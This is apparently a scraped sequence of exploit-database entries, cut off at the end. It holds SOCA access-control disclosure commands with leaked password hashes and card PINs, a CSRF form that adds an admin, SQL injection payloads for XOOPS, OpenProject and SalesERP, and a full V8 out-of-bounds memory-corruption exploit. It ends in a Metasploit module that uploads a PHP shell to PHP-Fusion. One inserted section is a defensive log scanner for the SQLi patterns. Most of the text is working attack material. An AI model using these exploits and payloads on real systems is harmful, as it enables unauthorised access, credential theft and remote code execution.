     Summary: The company's products include proximity and fingerprint access control system, time and attendance, electric locks, card reader and writer, keyless entry system and other 30 specialized products. All products are attractively designed with advanced technology in accordance with users' safety and convenience which also fitted international standard.

     Desc: Insecure direct object references occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources and functionalities in the system.

     Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
                Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
                Apache/2.2.22 (Win32)
                PHP/5.4.13
                Firebird/InterBase DBMS

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience

     Advisory ID: ZSL-2019-5517
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5517.php

     20.04.2018

     --

     Authenticated users password hash disclosure via Get_Permissions_From_DB.php:
     -----------------------------------------------------------------------------

     # curl -s http://10.0.0.3/Permission/Get_Permission_From_DB.php -H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"

     [{"Idx":1,"Id":"USER","Password":"4a7d1ed414474e4033ac29ccb8653d9b","Access":"ffffff00ff00ffffff00"},{"Idx":2,"Id":"soca","Password":"3c0d71fab22bc8703324e06d59a81700","Access":"ffffff00ff00ffffff00"}]

     Unauthenticated users passwords (pins) disclosure via Ac10_ReadSortCard:
     ------------------------------------------------------------------------

     # curl -X POST http://10.0.0.3/cgi-bin/Reader_Action.cgi/Ac10_ReadSortCard --data "Reader=%7B%22Idx%22%3A5%2C%22Model%22%3A502%2C%22Comm%22%3A%22TCP%2C10.0.0.3%2C4444%22%2C%22Timeout%22%3A1%2C%22SubNames%22%3A%7B%221%22%3A%22%22%2C%222%22%3A%22%22%2C%223%22%3A%22%22%2C%224%22%3A%22%22%2C%225%22%3A%22%22%2C%226%22%3A%22%22%2C%227%22%3A%22%22%2C%228%22%3A%22%22%7D%2C%22CreateTime%22%3A%222016-04-28+15%3A57%3A31%22%2C%22EditTime%22%3A%222018-12-26+17%3A14%3A37%22%2C%22Polling%22%3A1%2C%22Done%22%3Afalse%7D&Section=17" -s |grep Password |lolcat

     {"cmd":"readcard","success":true,"Reader":{"Idx":5,"Model":502,"SubNames":
     {"8":"","7":"","6":"","5":"","4":"","3":"","2":"","1":""},"No":1,"Polling":
     1,"EditTime":"2018-12-26 17:14:37","Name":"READER017","Done":false,"Comm":"TCP,10.0.0.3,4444",
     "Timeout":1,"CreateTime":"2016-04-28 15:57:31"},"Section":17,"Cards":[
     {"Card":"3758236739","Password":"0000","Timezone":"1"},{"Card":"3758294894","Password":"0000","Timezone":"1"},
     {"Card":"3758393748","Password":"0000","Timezone":"1"},{"Card":"3758397434","Password":"0000","Timezone":"1"},
     {"Card":"3758526944","Password":"0000","Timezone":"1"},{"Card":"3758556239","Password":"0000","Timezone":"1"},
     {"Card":"3759183323","Password":"0000","Timezone":"1"},{"Card":"3759289453","Password":"0000","Timezone":"1"},
     {"Card":"3759444892","Password":"0000","Timezone":"1"},{"Card":"3759608121","Password":"0000","Timezone":"1"},
     {"Card":"3759700024","Password":"0000","Timezone":"1"},{"Card":"3760195859","Password":"0000","Timezone":"1"},
     {"Card":"3760330834","Password":"0000","Timezone":"1"},{"Card":"3760455789","Password":"0000","Timezone":"1"},
     {"Card":"3760493498","Password":"0000","Timezone":"1"},{"Card":"3760555917","Password":"0000","Timezone":"1"},
     {"Card":"3760674062","Password":"0000","Timezone":"1"},{"Card":"3761256706","Password":"0000","Timezone":"1"},
     {"Card":"3761275358","Password":"0000","Timezone":"1"},{"Card":"3761386285","Password":"0000","Timezone":"1"},
     {"Card":"3761398620","Password":"0000","Timezone":"1"},{"Card":"3761452653","Password":"0000","Timezone":"1"},
     {"Card":"3761514319","Password":"0000","Timezone":"1"},{"Card":"3761543092","Password":"0000","Timezone":"1"},
     {"Card":"3761766657","Password":"0000","Timezone":"1"},{"Card":"3761783860","Password":"0000","Timezone":"1"},
     {"Card":"3762311449","Password":"0000","Timezone":"1"},{"Card":"3762313335","Password":"0000","Timezone":"1"},
     {"Card":"3762328203","Password":"0000","Timezone":"1"},{"Card":"3762384973","Password":"0000","Timezone":"1"},
     {"Card":"3762647673","Password":"0000","Timezone":"1"},{"Card":"3762688310","Password":"0000","Timezone":"1"},
     {"Card":"3762771467","Password":"0000","Timezone":"1"},{"Card":"3762827566","Password":"0000","Timezone":"1"},
     {"Card":"3762843960","Password":"0000","Timezone":"1"},{"Card":"3762910530","Password":"0000","Timezone":"1"},
     {"Card":"3763344650","Password":"0000","Timezone":"1"},{"Card":"3763417869","Password":"0000","Timezone":"1"},
     {"Card":"3763492897","Password":"0000","Timezone":"1"},{"Card":"3763734440","Password":"0000","Timezone":"1"},
     {"Card":"3763865189","Password":"0000","Timezone":"1"},{"Card":"3763889211","Password":"0000","Timezone":"1"},
     {"Card":"3764619719","Password":"0000","Timezone":"1"},{"Card":"3764811544","Password":"0000","Timezone":"1"},
     {"Card":"3764846862","Password":"0000","Timezone":"1"},{"Card":"3765568542","Password":"0000","Timezone":"1"},
     {"Card":"3765790491","Password":"0000","Timezone":"1"},{"Card":"3765917518","Password":"0000","Timezone":"1"},
     {"Card":"3765962614","Password":"0000","Timezone":"1"},{"Card":"3765978672","Password":"0000","Timezone":"1"},
     {"Card":"3766032648","Password":"0000","Timezone":"1"},{"Card":"3766498811","Password":"0000","Timezone":"1"},
     {"Card":"3766625241","Password":"0000","Timezone":"1"},{"Card":"3766970803","Password":"0000","Timezone":"1"},
     {"Card":"3767105946","Password":"0000","Timezone":"1"},{"Card":"3767601584","Password":"0000","Timezone":"1"},
     ...
     ...
     ...

     phpinfo() disclosure:
     ---------------------

     # curl -s http://10.0.0.3/phpinfo.php
  17. SOCA Access Control System 180612 CSRF Add Admin Exploit

     Vendor: SOCA Technology Co., Ltd
     Product web page: http://www.socatech.com
     Affected version: 180612, 170000 and 141007

     Summary: The company's products include Proximity and Fingerprint access control system, Time and Attendance, Electric Locks, Card reader and writer, keyless entry system and other 30 specialized products. All products are attractively designed with advanced technology in accordance with users' safety and convenience which also fitted international standard.

     Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

     Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
                Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
                Apache/2.2.22 (Win32)
                PHP/5.4.13

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience

     Advisory ID: ZSL-2019-5520
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5520.php

     20.04.2018

     --

     <html>
       <body>
         <script>history.pushState('', 'shpa', '/index-pc.php')</script>
         <form action="http://10.0.0.3/Permission/Insert_Permission.php" method="POST">
           <input type="hidden" name="Permission" value='{"Idx":null,"Id":"Imposter","Password":"123456","Access":"ffffff00ff00ffffff00"}' />
           <input type="submit" value="Forge!" />
         </form>
       </body>
     </html>
  18. [+] Sql Injection on XOOPS CMS v.2.5.9
     [+] Date: 12/05/2019
     [+] Risk: High
     [+] CWE Number : CWE-89
     [+] Author: Felipe Andrian Peixoto
     [+] Vendor Homepage: https://xoops.org/
     [+] Contact: [email protected]
     [+] Tested on: Windows 7 and Gnu/Linux
     [+] Dork: inurl:gerar_pdf.php inurl:modules // use your brain ;)
     [+] Exploit : http://host/patch/modules/patch/gerar_pdf.php?cid= [SQL Injection]
     [+] EOF
19. <!--
Since commit https://chromium.googlesource.com/v8/v8.git/+/c22bb466d8934685d897708119543d099b9d2a9a turbofan supports inlining calls to array.includes and array.indexOf.

The logic of the function is roughly:

1. Check the set of possible Maps of the array type (with NodeProperties::InferReceiverMaps).
2. If they are all fast arrays, find the correct CSA builtin to handle the fast path (`Callable const callable = search_variant == SearchVariant::kIndexOf ? GetCallableForArrayIndexOf(kind, isolate()) : GetCallableForArrayIncludes(kind, isolate());`).
3. Load the array length and call the builtin.

The builtin will assume that the array is a FastArray with packed (dense) elements and directly search linearly through the backing memory.

The issue here is that NodeProperties::InferReceiverMaps doesn't necessarily guarantee that the object will always have the inferred Map. In case it can't prove that the objects will always have the inferred Maps it will return kUnreliableReceiverMaps:

  // Walks up the {effect} chain to find a witness that provides map
  // information about the {receiver}. Can look through potentially
  // side effecting nodes.
  enum InferReceiverMapsResult {
    kNoReceiverMaps,         // No receiver maps inferred.
    kReliableReceiverMaps,   // Receiver maps can be trusted.
    kUnreliableReceiverMaps  // Receiver maps might have changed (side-effect),
                             // but instance type is reliable.
  };
  static InferReceiverMapsResult InferReceiverMaps(
      JSHeapBroker* broker, Node* receiver, Node* effect,
      ZoneHandleSet<Map>* maps_return);

In which case the caller is responsible for guarding any optimizations based on the inferred Maps (e.g. by adding MapChecks). However, in this case the calling function fails to do so. As such, if the array is changed to dictionary mode before the inlined function call, the CSA builtin will read data out-of-bounds.

The following sample, found through fuzzing, triggers this case:

function v7(v8,v11) {
  function v14(v15,v16) {
  }
  // Transition to dictionary mode in the final invocation.
  const v17 = v11.__defineSetter__(v8, v14);
  // Will then read OOB.
  const v18 = v11.includes(1234);
  return v18;
}
v7([], []);
v7([], []);
%OptimizeFunctionOnNextCall(v7);
v7([], []);
const v57 = v7(String(0x1000000), []);

Note: the commit introducing this vulnerability does not appear to be included in the stable Chrome release yet.
-->
<script>
var conv_ab = new ArrayBuffer(8);
var conv_f64 = new Float64Array(conv_ab);
var conv_u64 = new BigUint64Array(conv_ab);

BigInt.prototype.to_float = function() {
  conv_u64[0] = this;
  return conv_f64[0];
};
BigInt.prototype.hex = function() {
  return '0x'+this.toString(16);
};
Number.prototype.to_int = function() {
  conv_f64[0] = this;
  return conv_u64[0];
}
Number.prototype.hex = function() {
  return this.to_int().hex();
}

let ab = undefined;

function leak(i, smi_arr, float_arr) {
  let high_bytes = 0;
  smi_arr.__defineSetter__(i, ()=>{});
  ab = new ArrayBuffer(2<<26);
  let smi_boundary = [1, 1, 1, 1];
  for (high_bytes = 0; high_bytes < 0xffff; high_bytes++) {
    smi_boundary[0] = high_bytes;
    let idx = smi_arr.indexOf(high_bytes, 20);
    if (idx == 20) {
      break;
    }
  }
  float_arr.__defineSetter__(i, ()=>{});
  let tmp = new Uint32Array(ab);
  let float_boundary = [1.1, 1.1, 1.1, 1.1];
  let start = (BigInt(high_bytes)<<32n).to_float();
  let end = ((BigInt(high_bytes)<<32n)+0x1000000n).to_float();
  let step = 0x1000n.to_float();
  for (let j = start; j < end; j += step) {
    float_boundary[0] = j;
    if (float_arr.indexOf(j, 30) == 30) {
      return [j, smi_boundary, float_boundary, tmp];
    }
  }
}

for (let i = 0; i < 10; i++) {
  leak('', [1], [1.1]);
}
let res = leak('100000', [1], [1.1]);
if (res == undefined) {
  location.reload();
  return;
}
let ab_addr = res[0].to_int();
console.log(`Buf at ${ab_addr.hex()}`);
let u64 = new BigUint64Array(ab);

function write_map(offset, type) {
  u64[offset/8n + 0x0n] = 0x12345n;
  u64[offset/8n + 0x1n] = 0x190000002900a804n | (type << 32n);
  u64[offset/8n + 0x2n] = 0x92003ffn; // bitfield 3
  u64[offset/8n + 0x3n] = 0x41414141n; // prototype
  u64[offset/8n + 0x4n] = 0x41414141n; // constructor or back ptr
  u64[offset/8n + 0x5n] = 0n; // transitions or proto info
  u64[offset/8n + 0x6n] = 0x41414141n; // instance descriptors
  u64[offset/8n + 0x7n] = 0n; // layout descriptor
  u64[offset/8n + 0x8n] = 0x41414141n; // dependent code
  u64[offset/8n + 0x9n] = 0n; // prototype validity cell
}

// SPACE_SIZE = 1<<18
// LARGE_OBJ_SIZE = (1<<17) +1
const SPACE_SIZE = 1n<<19n;
const SPACE_MASK = 0xffffffffffffffffn ^ (SPACE_SIZE-1n);
let space_start_addr = (ab_addr & SPACE_MASK) + SPACE_SIZE;
let space_start_off = space_start_addr - ab_addr;
console.log(`Space start: ${space_start_addr.hex()}`);

let free_mem = space_start_addr + 4096n;

function page_round(addr) {
  if ((addr & 0xfffn) == 0n) {
    return addr;
  }
  return (addr + 0x1000n) & 0xfffffffffffff000n;
}

function u64_offset(addr) {
  return (addr - ab_addr) / 8n;
}

class V8String {
  constructor(type, data) {
    let size = BigInt(data.length)*8n;
    this.addr = free_mem;
    free_mem += page_round(size);
    this.map = free_mem;
    free_mem += page_round(0x9n*8n);
    this.off = u64_offset(this.addr);
    u64[this.off] = this.map|1n;
    for (let i = 0n; i < data.length; i++) {
      u64[this.off + 1n + i] = data[i];
    }
    let map_off = u64_offset(this.map);
    u64[map_off + 0x0n] = 0x12345n;
    u64[map_off + 0x1n] = 0x190000002900a804n | (type << 32n);
    u64[map_off + 0x2n] = 0x92003ffn; // bitfield 3
    u64[map_off + 0x3n] = 0x41414141n; // prototype
    u64[map_off + 0x4n] = 0x41414141n; // constructor or back ptr
    u64[map_off + 0x5n] = 0n; // transitions or proto info
    u64[map_off + 0x6n] = 0x41414141n; // instance descriptors
    u64[map_off + 0x7n] = 0n; // layout descriptor
    u64[map_off + 0x8n] = 0x41414141n; // dependent code
    u64[map_off + 0x9n] = 0n; // prototype validity cell
  }
}

class ConsString extends V8String {
  constructor(size, left, right) {
    super(0x29n, [(size<<32n) | 0x00000003n, left|1n, right|1n]);
  }
}

class SliceString extends V8String {
  constructor(parent_string, offset, len=0x100n) {
    super(0x2bn, [(len<<32n) | 0x00000003n, parent_string|1n, offset<<32n]);
  }
}

class SeqString extends V8String {
  constructor(data) {
    super(0x08n, [(BigInt(data.length*8) << 32n | 0xdf61f02en)].concat(data));
  }
}

// object in young generation == space+8 has one of these bits set: 0x18
u64[space_start_off/8n + 0x1n] = 0x18n;

LEAK_STRING_SZ = 0x1;
let seq_string = new SeqString([0x4141414141414141n]);
let root_string = new ConsString(BigInt(LEAK_STRING_SZ), seq_string.addr, seq_string.addr);

function foo(i, arr, to_search, to_copy) {
  arr.__defineSetter__(i, ()=>{});
  let a = [1.1, to_copy];
  let boundary = [to_search];
  return [arr.indexOf(to_search), a, boundary];
}

for (let i = 0; i < 100000; i++) {
  foo('', [Array], '', 1.1);
}

function doit(to_search, to_copy) {
  return foo('100000', [Array], to_search, to_copy)[0];
}

doit('A'.repeat(LEAK_STRING_SZ), (root_string.addr|1n).to_float());

let corrupted_array = [1.1, 1.2, 1.3];
console.log(`string at = ${u64[root_string.off+2n].hex()}`);
let corrupted_array_addr = u64[root_string.off+2n]+0x40n;
let backing_store_sz_addr = corrupted_array_addr + 0x38n;

GC_STRING_SZ = 0x30000000;
u64[space_start_off/8n + 0x0n] = 0x1234n;
// object in young generation == space+8 has one of these bits set: 0x18
u64[space_start_off/8n + 0x1n] = 0xff000n;
// marking bitmap pointer
u64[space_start_off/8n + 0x2n] = backing_store_sz_addr + 4n - (0x70n*0x4n);
u64[space_start_off/8n + 0x6n] = space_start_addr;
// incremental_marking ptr
u64[space_start_off/8n + 0xf7n] = space_start_addr;

seq_string = new SeqString([0x4141414141414141n]);
root_string = new ConsString(BigInt(GC_STRING_SZ), seq_string.addr, seq_string.addr);
doit('A'.repeat(GC_STRING_SZ), (root_string.addr|1n).to_float());

corrupted_array[100] = 1.1;
console.log('=== OOB array leak ===');
for (let i = 0; i < 100; i++) {
  console.log(corrupted_array[i].hex());
}
</script>
20. SEC Consult Vulnerability Lab Security Advisory < 20190510-0 >
=======================================================================
              title: Unauthenticated SQL Injection vulnerability
            product: OpenProject
 vulnerable version: 5.0.0 - 8.3.1
      fixed version: 8.3.2 & 9.0.0
         CVE number: CVE-2019-11600
             impact: Critical
           homepage: https://www.openproject.org
              found: 2019-04-17
                 by: T. Soo (Office Bangkok)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"OpenProject is the leading open source project management software. Support your project management process along the entire project life cycle: From project initiation to closure."

Source: https://www.openproject.org/

Business recommendation:
------------------------
The vendor provides a patch which should be applied immediately.

An in-depth security analysis performed by security professionals is highly advised, as the software may be affected by further security issues.

Vulnerability overview/description:
-----------------------------------
An SQL injection vulnerability has been identified in the web "activities API". An unauthenticated attacker could successfully perform an attack to extract potentially sensitive information from the database if OpenProject is configured not to require authentication for API access.

Proof of concept:
-----------------
Requesting the following URL will trigger a time delay as a proof of concept for exploiting the blind SQL injection:

http://<host>/api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(7777%3d7777

Vulnerable / tested versions:
-----------------------------
The vulnerability has been identified in OpenProject version 8.3.1 which was the most current version at the time of discovery. According to the vendor all versions between 5.0.0 and 8.3.1 are affected.
Older versions (< 5.0.0) are not vulnerable.

Vendor contact timeline:
------------------------
2019-04-30: Contacting vendor through [email protected]
2019-04-30: A patch is published in version 8.3.2
2019-05-06: Vendor publishes further details
2019-05-10: Release of security advisory

Solution:
---------
The vendor provides a patched version 8.3.2 and a security notice with further information:
https://www.openproject.org/release-notes/openproject-8-3-2
https://groups.google.com/forum/#!msg/openproject-security/XlucAJMxmzM/hESpOaFVAwAJ

Workaround:
-----------
None

Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Thanaphon Soo / @2019
21. ===========================================================================================
# Exploit Title: SalesERP v.8.1 SQL Inj.
# Dork: N/A
# Date: 13-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp
# Version: v8.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ERP is a modern and responsive small business management system. It is developed with PHP and the CodeIgniter framework. It is designed and developed for shops, small businesses, companies and any type of business. It has accounting, management, invoice, user and data analysis.
===========================================================================================
# POC - SQLi
# Parameters : customer_id, product_id
# Attack Pattern : %27/**/oR/**/4803139=4803139/**/aNd/**/%276199%27=%276199
# POST Method : http://localhost/erpbusiness/SalesERPv810/Cproduct/product_by_search?product_id=99999999[SQL Inject Here]
# POST Method : http://localhost/erpbusiness/SalesERPv810/Ccustomer/paid_customer_search_item?customer_id=99999999[SQL Inject Here]
===========================================================================================

###########################################################################################

===========================================================================================
# Exploit Title: SalesERP v.8.1 SQL Inj.
# Dork: N/A
# Date: 13-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp
# Version: v8.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ERP is a modern and responsive small business management system. It is developed with PHP and the CodeIgniter framework. It is designed and developed for shops, small businesses, companies and any type of business. It has accounting, management, invoice, user and data analysis.
===========================================================================================
# POC - SQLi
# Parameters : supplier_name
# Attack Pattern : %27/**/RLIKE/**/(case/**/when/**//**/4190707=4190707/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
# POST Method : http://localhost/erpbusiness/SalesERPv810/Csupplier/search_supplier?supplier_name=2900757&supplier_id=[SQL Inject Here]
===========================================================================================

###########################################################################################

===========================================================================================
# Exploit Title: SalesERP v.8.1 SQL Inj.
# Dork: N/A
# Date: 13-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp
# Version: v8.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ERP is a modern and responsive small business management system. It is developed with PHP and the CodeIgniter framework. It is designed and developed for shops, small businesses, companies and any type of business. It has accounting, management, invoice, user and data analysis.
===========================================================================================
# POC - SQLi
# Parameters : supplier_name
# Attack Pattern : 1260781%27 oR if(length(0x454d49524f474c55)>1,sleep(3),0) --%20
# POST Method : http://localhost/erpbusiness/SalesERPv810/Cproduct/add_supplier?add-supplier=Save&address=[TEXT INPUT]4990130&details=[TEXT INPUT]5207543&supplier_name=[SQL Inject Here]
===========================================================================================
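The XOOPS, OpenProject and SalesERP posts above all carry the same three fingerprints in the request URL: a time-delay call (PG_SLEEP / sleep), a quoted tautology padded with mixed case, and inline /**/ comments used as whitespace. The following is an added example (not code from any of those posts or vendors) of how a defender normalises access-log request targets and flags those patterns. The log lines are constructed for the example; the hosts, paths and IP addresses are placeholders, and the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the advisories); the
# request targets mirror the parameters the three posts describe.
SAMPLE_LOG = """\
203.0.113.5 - - [13/May/2019:10:01:02 +0000] "GET /api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(7777%3d7777 HTTP/1.1" 200 512
203.0.113.5 - - [13/May/2019:10:01:09 +0000] "GET /modules/news/gerar_pdf.php?cid=1%27%20oR%204803139=4803139%20aNd%20%276199%27=%276199 HTTP/1.1" 200 2048
203.0.113.5 - - [13/May/2019:10:01:15 +0000] "POST /SalesERPv810/Cproduct/product_by_search?product_id=99999999%27/**/oR/**/4803139=4803139/**/aNd/**/%276199%27=%276199 HTTP/1.1" 200 311
203.0.113.5 - - [13/May/2019:10:01:21 +0000] "POST /SalesERPv810/Cproduct/add_supplier?supplier_name=1260781%27%20oR%20if(length(0x454d49524f474c55)%3E1,sleep(3),0)%20--%20 HTTP/1.1" 200 311
203.0.113.5 - - [13/May/2019:10:01:27 +0000] "POST /SalesERPv810/Csupplier/search_supplier?supplier_name=2900757&supplier_id=%27/**/RLIKE/**/(case/**/when/**//**/4190707=4190707/**/then/**/0x45/**/else/**/0x28/**/end)/**/and/**/%27%25%27=%27 HTTP/1.1" 200 311
198.51.100.7 - - [13/May/2019:10:02:00 +0000] "GET /api/v3/activities/1 HTTP/1.1" 200 640
198.51.100.7 - - [13/May/2019:10:02:03 +0000] "GET /modules/news/gerar_pdf.php?cid=12 HTTP/1.1" 200 2048
"""

# Pulls the method and request target out of a common-log-format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Each rule runs against the normalised target (URL-decoded, inline comments
# stripped, lower-cased), so "oR"/"aNd" casing and /**/ padding no longer hide
# the payload. Order matters: the first matching rule names the hit.
RULES = {
    "postgres-time-delay": re.compile(r"pg_sleep\s*\("),
    "mysql-time-delay": re.compile(r"\b(sleep|benchmark)\s*\("),
    "tautology": re.compile(r"'\s*or\s+\d+\s*=\s*\d+"),
    "conditional-rlike": re.compile(r"\brlike\b.*\bcase\s+when\b"),
    "quote-comment-terminator": re.compile(r"'\s*--(\s|$)"),
}


def normalise_target(target: str) -> str:
    """Decode twice (catches double-encoding), turn comments into spaces, fold case."""
    decoded = unquote_plus(unquote_plus(target))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded).lower()


def scan_access_log(text: str):
    """Return (source_ip, rule_name, normalised_target) for every flagged line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        src = line.split(" ", 1)[0]
        norm = normalise_target(m.group("target"))
        for name, rule in RULES.items():
            if rule.search(norm):
                hits.append((src, name, norm))
                break
    return hits


if __name__ == "__main__":
    for src, rule, target in scan_access_log(SAMPLE_LOG):
        print(f"{src}  {rule:24s} {target[:80]}")
```

Decoding before matching is the important step: the raw log line for the SalesERP request contains neither the word "or" nor a quote character, so a rule applied to the undecoded text misses it. Running the scan on the sample flags the five 203.0.113.5 requests and leaves the two ordinary requests alone.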
22. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "PHP-Fusion < 9.03.00 - 'Edit Profile' Remote Code Execution",
      'Description'    => %q(
        This module exploits command execution vulnerability in PHP-Fusion 9.03.00 and prior versions.
        It is possible to execute commands in the system with ordinary user authority. No need admin privilege.
        There is almost no control in the avatar upload section in the profile edit area.
        Only a client-based control working with javascript. (Simple pre-check)
        If we do not care about this control, the desired file can be sent to the server via Interception-Proxies.
        The module opens the meterpreter session for you by bypassing the controls.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
        ],
      'References'     =>
        [
          ['URL', 'http://www.pentest.com.tr/exploits/PHP-Fusion-9-03-00-Edit-Profile-Remote-Code-Execution.html'], # Details
          ['URL', 'https://www.php-fusion.co.uk'],
          ['URL', 'https://github.com/php-fusion/PHP-Fusion/commit/943432028b9e674433bb3f2a128b2477134110e6']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Automatic', {}]],
      'Privileged'     => false,
      'DisclosureDate' => "May 11 2019",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "Base PHP-Fusion directory path", '/']),
        OptString.new('USERNAME', [true, "Username to authenticate with", '']),
        OptString.new('PASSWORD', [true, "Password to authenticate with", ''])
      ]
    )
  end

  def exec
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "images", "avatars", "#{@shell}") # shell url
    })
  end

  ##
  # Login and cookie information gathering
  ##
  def login(uname, pass, check)
    # 1st request to get fusion_token
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "home.php")
    })

    cookie = res.get_cookies
    @fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0]

    # 2nd request to login
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'home.php'),
      'cookie'    => cookie,
      'vars_post' => {
        'fusion_token' => @fustoken,
        'form_id'      => 'loginform',
        'user_name'    => uname,
        'user_pass'    => pass,
        'login'        => ''
      }
    )

    cookie = res.get_cookies
    location = res.redirection.to_s

    if res && res.code == 302 && location.include?('login.php?error')
      fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}")
    else
      return cookie
    end
    return nil
  end

  ##
  # Upload malicious file // payload integration
  ##
  def upload_shell(cookie, check)
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "edit_profile.php"),
      'cookie' => cookie
    })

    ncookie = cookie + " " + res.get_cookies # gathering all cookie information

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "edit_profile.php"),
      'cookie' => ncookie
    })

    # fetch some necessary post data informations
    fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0]
    userid   = res.body.split("profile.php?lookup=")[1].split('"><i class=')[0]
    userhash = res.body.split("userhash' value='")[1].split("' style")[0]
    usermail = res.body.split("user_email' value='")[1].split("' >")[0]

    # data preparation to delete priv avatar
    delete = Rex::MIME::Message.new
    delete.add_part("#{fustoken}", nil, nil, 'form-data; name="fusion_token"')
    delete.add_part('userfieldsform', nil, nil, 'form-data; name="form_id"')
    delete.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="user_name"')
    delete.add_part("#{usermail}", nil, nil, 'form-data; name="user_email"')
    delete.add_part('1', nil, nil, 'form-data; name="delAvatar"')
    delete.add_part("#{userid}", nil, nil, 'form-data; name="user_id"')
    delete.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"')
    delete.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"')
    delete.add_part('Update Profile', nil, nil, 'form-data; name="update_profile"')
    deld = delete.to_s

    res = send_request_cgi({
      'method' => 'POST',
      'data'   => deld,
      'agent'  => 'Mozilla',
      'ctype'  => "multipart/form-data; boundary=#{delete.bound}",
      'cookie' => ncookie,
      'uri'    => normalize_uri(target_uri.path, "edit_profile.php")
    })
    # priv avatar deleted.

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "edit_profile.php"),
      'cookie' => cookie
    })

    ncookie = cookie + " " + res.get_cookies # recheck cookies

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "edit_profile.php"),
      'cookie' => ncookie
    })

    # They changed. fetch again...
    fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0]
    userid   = res.body.split("profile.php?lookup=")[1].split('"><i class=')[0]
    userhash = res.body.split("userhash' value='")[1].split("' style")[0]
    usermail = res.body.split("user_email' value='")[1].split("' >")[0]

    # The "php" string must be removed for bypass. We can use "<?"
    pay = payload.encoded.split("/**/")[1]
    fname = Rex::Text.rand_text_alpha_lower(8) + ".php"
    @shell = "#{fname}"

    # data preparation to upload new avatar
    pdata = Rex::MIME::Message.new
    pdata.add_part("#{fustoken}", nil, nil, 'form-data; name="fusion_token"')
